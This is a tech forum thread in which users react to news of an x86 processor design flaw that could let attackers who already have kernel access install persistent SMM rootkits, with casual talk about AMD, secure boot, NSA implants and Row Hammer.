Flaw In Intel Chips Opens Door To Rootkits

H

HardOCP News

[H] News
Joined
Dec 31, 1969
Messages
0
Security researchers have found a design flaw in the x86 processors that could allow attackers to install a rootkit. It's amazing no one has discovered this until now.

To exploit the vulnerability and install the rootkit, attackers would need to already have kernel or system privileges on a computer. That means the flaw cant be used by itself to compromise a system, but could make an existing malware infection highly persistent and completely invisible.
 
Ashbringer said:
AMD chips? Anyone? No one?
Click to expand...

ComputerWorld Article said:
Domas only tested the exploit successfully on Intel processors, but noted that x86 processors made by AMD should in theory be vulnerable as well.
Click to expand...

Since AMD uses an X86 license for Intel’s x86 instruction set architecture and featuring various extensions, likely not.
 
Seeing that they need to have kernel-level access, they can pretty much do anything they like at that point. The main issue is that it allows software to override Intel's worthless BIOS-based security code, which very few things use because we all know it's crap anyway. It mostly just boils down to making exploits harder to get rid of (thanks Intel).

The plus is that it totally invalidates the concept of secure boot.
 
Quix said:
The plus is that it totally invalidates the concept of secure boot.
Click to expand...

During 2014's DEFCON, there was a lot of already broken and not secure thingies done to secure boot so that would be more like just poking another hole in an already leaky ship.
 
So Intel knew about the problem way back in 2006 as they had patents for the fix.

Yet intel won't release data on what chips are vulnerable so that government, corporate, and personal entities can update their platform to mitigate the risk.
 
Is this not an open invitation to hackers?......Is there any evidence that this vulnerability has been exploited?
 
So if you have root you can change shit. How interesting.
 
mothman said:
Is this not an open invitation to hackers?......Is there any evidence that this vulnerability has been exploited?
Click to expand...

I'd swear that there'd been leaks (snowden?) that the government was able to infect computers even if the the machine was wiped and the OS reinstalled....so my guess is yes it is.
 
nilepez said:
I'd swear that there'd been leaks (snowden?) that the government was able to infect computers even if the the machine was wiped and the OS reinstalled....so my guess is yes it is.
Click to expand...

That was mostly via compromised hard drive firmware.
 
Kueller said:
That was mostly via compromised hard drive firmware.
Click to expand...

Fair enough. I'd still be surprised if the NSA didn't already exploit the vulnerability. We know they find bugs and don't say anything, because security requires insecurity :rolleyes:
 
IIRC from the earlier SMM rootkit flaw, the knowledge required to attack a particular system is pretty specific to the vendor so it's not a general exploit. It's just another tool that can be used in targeted attacks, and most likely has been used many times.

Ashbringer said:
AMD chips? Anyone? No one?
Click to expand...
AMD uses SMM, so it's also vulnerable.
 
Imhotep said:
Keyword "Could" I would fly if I were the superman.
Click to expand...

wikipedia article on SMM said:
By design, the operating system cannot override or disable the SMI. Due to this fact, it is a target for malicious rootkits to reside in,[10][11][12] including NSA's "implants"[13] which have individual code names for specific hardware, like SOUFFLETROUGH for Juniper Networks firewalls,[14] SCHOOLMONTANA for J-series routers of the same company,[15] DEITYBOUNCE for DELL,[16] or IRONCHEF for HP Proliant servers.[17]
Click to expand...

Nice to meet you, Clark! :p
 
But can Angelina Jolie still hack the Gibson to access the kernal and install the rootkit?
 
so what that paper said was that you can use this Design Flaw to modify an i5 into an i7.
 
evilsofa said:
I thought this was going to be about row hammer but this is apparently something else.
Click to expand...

Row Hammer is a problem with DRAM rather than the CPU though.

That said, I'm surprised the Row Hammer exploit hasn't gotten more attention. I made a post about it in the memory sub-forum once and never got any replies. It seems like a very serious exploit that has actually been demonstrated in practical attacks and yet it has pretty much been ignored.
 
You must log in or register to reply here.
Back
Top